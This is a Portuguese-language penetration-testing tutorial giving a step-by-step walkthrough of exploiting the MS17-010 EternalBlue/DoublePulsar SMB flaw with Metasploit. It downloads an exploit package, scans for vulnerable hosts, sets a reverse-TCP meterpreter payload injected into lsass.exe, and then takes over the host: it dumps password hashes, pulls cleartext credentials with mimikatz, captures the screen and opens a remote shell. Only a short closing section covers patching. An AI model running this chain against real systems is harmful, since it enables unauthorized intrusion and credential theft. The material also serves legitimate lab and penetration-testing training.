A vulnerabilidade EternalBlue/DoublePulsar possibilitou que mais de 230.000 mil computadores fossem infectados pelo WannaCry causando um grande transtorno em grandes empresas pelo mundo.

No dia 14 de março de 2017 a Microsoft publicou um boletim crítico de segurança (MS17-010) informando como resolver o problema.

Ainda é possível encontrar empresas que não atualizaram seus sistemas e estão vulneráveis e podem ter seus sistemas explorados.

Atenção

Mantenha o ambiente que você administra ou de seus clientes sempre atualizados para evitar qualquer tipo de exploração.

Preparando o Ambiente

01 - Passo

Adicione a arquitetura i386 (para computadores 32 bits) no repositório do Debian.

Linux
dpkg --add-architecture i386

apt-get update

02 - Passo

Realize a instalação dos pacotes libwine, wine, wine32 e winetricks

Linux
apt-get install libwine wine wine32 winetricks

03 - Passo

Após a instalação certifique-se que o Wine esteja instalado, em seguida execute o comando exit para sair do Wine.

Linux
wine cmd
Microsoft Windows 6.1.7601 (4.0.2)

Z:\>exit

04 - Passo

Realize o download do exploit, descompacte o arquivo ms17-010.tar.gz e liste o conteúdo do diretório.

Linux
wget http://www.100security.com.br/downloads/ms17-010.tar.gz

tar xf ms17-010.tar.gz

cd ms17-010/

ls -l

05 - Passo

Realize o download do exploit, descompacte o arquivo ms17-010.tar.gz e liste o conteúdo do diretório, em seguida volte ao diretório raiz ( / ).

Linux
mv * /usr/share/metasploit-framework/modules/exploits/windows/smb/

cd /

06 - Passo

Inicie o serviço do PostgreSQL utilizado pelo Metasploit-Framework.

Linux
service postgresql start

Encontrando o Host Vulnerável

07 - Passo

Para pesquisar se um ou mais hosts que estão na rede estão vulneráveis basta executar o script abaixo :

Observações
Você pode apenas informar o IP de um servidor ex: 192.168.0.20 ou informar a rede ex: 192.168.0.0/24.

Linux
nmap -p445 --script smb-vuln-ms17-010 192.168.0.20
State: VULNERABLE

08 - Passo

Utilizando a ferramenta nmap verifique a versão do Sistema Operacional e a versão dos Serviços disponíveis neste Servidor.

Linux
nmap -O -sV 192.168.0.20

Exploração

09 - Passo

Para iniciar o Metasploit-Framework digite :

Linux
msfconsole
msf5 >

10 - Passo

Defina o uso do exploit eternalblue_doublepulsar :

Linux
msf5 > use exploit/windows/smb/eternalblue_doublepulsar
msf5 exploit(windows/smb/eternalblue_doublepulsar) >

11 - Passo

Defina o payload para estabelecer a conexão reversa com o host :

x86 – 32 Bits (windows/meterpreter/reverse_tcp)
x64 – 64 Bits (windows/x64/meterpreter/reverse_tcp)

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/eternalblue_doublepulsar) > 

12 - Passo

Defina os dados correspondentes ao Host Local (PenTester), LHOST e LPORT.

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.0.100
lhost => 192.168.0.100

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lport 4444
lport => 4444

13 - Passo

Defina os dados correspondentes ao Host Remoto (Servidor Vulnerável), RHOST e RPORT.

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.0.20
rhost => 192.168.0.20

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rport 445
rport => 445

14 - Passo

Defina qual processo em execução do Windows será explorado, segue os mais utilizados :

  • lsass.exe
  • explorer.exe
  • wlms.exe
  • svchost.exe

Geralmente esta configuração já vem por padrão, mas é bom confirmar.

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe
PROCESSINJECT => lsass.exe

15 - Passo

Defina qual a arquitetura do Host Remoto (Servidor Vulnerável).

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
TARGETARCHITECTURE => x64

16 - Passo

Exiba os targets disponíveis e defina o target correspondente ao Sistema Operacional do Host Remoto (Servidor Vulnerável).

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > show targets

0  Windows XP (all services pack) (x86) (x64)
1  Windows Server 2003 SP0 (x86)
2  Windows Server 2003 SPI/SP2 (x86)
3  Windows Server 2003 (x64)
4  Windows Vista (x86)
5  Windows Vista (x64)
6  Windows Server 2008 (x86)
7  Windows Server 2008 R2 (x86) (x64)
8  Windows 7 (all services pack) (x86 (x64)

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set target 7
target => 7

17 - Passo

Utilize o comando show options para exibir todas as configurações definidas :

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > show options

18 - Passo

Execute o comando exploit para realizar a exploração e receber o shell (meterpreter).

Linux
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit
meterpreter >

19 - Passo

Execute o comando sysinfo para obter informações sobre o Host Remoto.

Linux
meterpreter > sysinfo

20 - Passo

Execute o comando hashdump para obter o Hash de todos os usuários do Host Remoto.

Linux
meterpreter > hashdump

21 - Passo

Execute o comando screenshot para obter o Print Screen da tela do Host Remoto.

Linux
meterpreter > screenshot
Screeshot saved to: UTuJvMqV.jpeg

22 - Passo

Carregue o módulo do MimiKatz para obter a Senha em memória do usuário logado.

Linux
meterpreter > load mimikatz

meterpreter > wdigest

Domínio: 100SECURITY Usuário: Administrator Senha: [email protected]

23 - Passo

Execute o comando shell para obter o acesso ao Prompt de Comando do Host Remoto.

Linux
meterpreter > shell

C:\Windows\system32>

24 - Passo

Execute comandos como hostname e ipconfig.

Linux
C:\Windows\system32> cd \

C:\> hostname

C:\> ipconfig

Como Resolver?

Atualização de segurança para o Microsoft Windows SMB Server (4013389)

Publicado em: 14 de março de 2017.

Link : docs.microsoft.com/pt-br/security-updates/securitybulletins/2017/ms17-010

Como verificar se a MS17-010 está instalada

Link : support.microsoft.com/pt-br/help/4023262/how-to-verify-that-ms17-010-is-installed



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2020 - 100SECURITY

Contato